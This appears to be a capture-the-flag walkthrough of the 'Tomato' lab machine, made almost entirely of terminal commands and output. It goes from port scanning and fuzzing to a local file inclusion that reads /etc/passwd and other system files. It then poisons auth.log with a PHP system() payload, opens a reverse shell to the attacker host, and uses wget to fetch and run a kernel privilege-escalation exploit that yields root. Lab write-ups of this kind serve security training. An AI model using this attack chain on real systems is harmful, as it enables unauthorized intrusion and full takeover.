Tomato 1
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV tomato.vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-02 20:19 EST
Nmap scan report for tomato.vuln (10.0.2.85)
Host is up (0.000057s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8888/tcp open http nginx 1.10.3 (Ubuntu)
MAC Address: 08:00:27:F6:72:4A (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds
Nmap reports three ports open, 21 for ftp, 80 for apache server and 8888 for nginx server
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 -z file,/usr/share/dirb/wordlists/common.txt http://tomato.vuln/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://tomato.vuln/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 20 L 49 W 652 Ch "http://tomato.vuln/"
000000011: 403 9 L 28 W 276 Ch ".hta"
000000013: 403 9 L 28 W 276 Ch ".htpasswd"
000000012: 403 9 L 28 W 276 Ch ".htaccess"
000000416: 301 9 L 28 W 318 Ch "antibot_image"
000002020: 200 20 L 49 W 652 Ch "index.html"
000003588: 403 9 L 28 W 276 Ch "server-status"
Total time: 3.280437
Processed Requests: 4614
Filtered Requests: 4607
Requests/sec.: 1406.519
Fuzzing apache webserver we found antibot_image folder
┌──(root@ghost)-[/home/ghost]
└─# curl -s http://tomato.vuln/antibot_image/antibots/info.php | grep "<\!--"
<!-- </?php include $_GET['image']; -->
After browsing through indexed files and folders we found info.php, here looking for comented lines
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 --hw=5074 -z file,/usr/share/dirb/wordlists/common.txt http://tomato.vuln/antibot_image/antibots/info.php?FUZZ=/etc/passwd
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://tomato.vuln/antibot_image/antibots/info.php?FUZZ=/etc/passwd
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001985: 200 1023 L 5115 W 86380 Ch "image"
Total time: 10.15646
Processed Requests: 4614
Filtered Requests: 4612
Requests/sec.: 454.2920
We found a Local File Inclusion
┌──(root@ghost)-[/home/ghost]
└─# python3 lfienum http://tomato.vuln/antibot_image/antibots/info.php?image= --only-url
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/passwd
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/apache2.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/crontab
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/fstab
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hosts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hosts.allow
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hosts.deny
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/issue
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/lsb-release
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/mtab
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/network/interfaces
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/networks
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/profile
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/resolv.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ssh/ssh_config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ssh/sshd_config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ssh/ssh_host_dsa_key.pub
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/vsftpd.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/cpuinfo
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/filesystems
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/interrupts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/ioports
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/meminfo
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/modules
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/mounts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/sched_debug
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/stat
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/swaps
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/version
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/net/arp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/auth.log
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/dpkg.log
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/faillog
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/lastlog
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/wtmp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/run/utmp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/adduser.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/envvars
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/autoindex.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/deflate.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/dir.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/mime.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/proxy.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/setenvif.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-available/ssl.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/alias.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/deflate.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/dir.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/mime.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/negotiation.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/mods-enabled/status.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/apache2/ports.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/bash.bashrc
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ca-certificates.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/debconf.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/debian_version
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/default/grub
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/deluser.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/dhcp/dhclient.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ftpusers
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/fuse.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/group
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hdparm.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/host.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/hostname
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/issue.net
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/kbd/config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/kernel-img.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ld.so.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ldap/ldap.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/login.defs
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/logrotate.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/ltrace.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/manpath.config
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/modules
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/nginx/nginx.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/os-release
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/pam.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/access.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/group.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/limits.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/namespace.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/pam_env.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/sepermit.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/security/time.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sensors3.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sysctl.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sysctl.d/10-console-messages.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/sysctl.d/10-network-security.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/timezone
> http://tomato.vuln/antibot_image/antibots/info.php?image=/etc/updatedb.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/devices
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/net/tcp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/net/udp
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/cmdline
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/mounts
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/stat
> http://tomato.vuln/antibot_image/antibots/info.php?image=/proc/self/status
> http://tomato.vuln/antibot_image/antibots/info.php?image=/usr/share/adduser/adduser.conf
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/nginx/access.log
> http://tomato.vuln/antibot_image/antibots/info.php?image=/var/log/nginx/error.log
Extracting vulnerable urls with lfienum
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce http://tomato.vuln/antibot_image/antibots/info.php?image= ssh 10.0.2.15 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/auth.log
💀 Sending payload
<?php system($_GET["cmd"]); ?>@tomato.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@tomato.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@tomato.vuln's password:
<?php system($_GET["cmd"]); ?>@tomato.vuln: Permission denied (publickey,password).
listening on [any] 1337 ...
connect to [10.0.2.15] from tomato.vuln [10.0.2.85] 52974
bash: cannot set terminal process group (778): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/antibot_image/antibots$
Checking if /var/log/auth.log is poisoneable and obtaining a reverse shell with lfi2rce
www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a && lsb_release -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
Listing system and distribution information for possible kernel vulnerabilities
┌──(root@ghost)-[/home/ghost]
└─# searchsploit "Linux Kernel Ubuntu 16.04 privilege escalation"
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation | linux_x86/local/42276.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | linux/local/40489.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We are going to use Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation linux/local/45010.c
┌──(root@ghost)-[/home/ghost]
└─# gcc 45010.c -o exploit
Compile the exploit with the correct library version
www-data@ubuntu:/tmp$ wget -q http://10.0.2.15/exploit
www-data@ubuntu:/tmp$ chmod +x exploit
Download the exploit to target machine and give executable permissions
www-data@ubuntu:/tmp$ ./exploit
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035dd4c00
[*] Leaking sock struct from ffff8800449bab40
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880043205840
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880043205840
[*] credentials patched, launching shell...
# cat /root/proof.txt
Sun_CSR_TEAM_TOMATO_JS_0232xx23
After executing the exploit we are root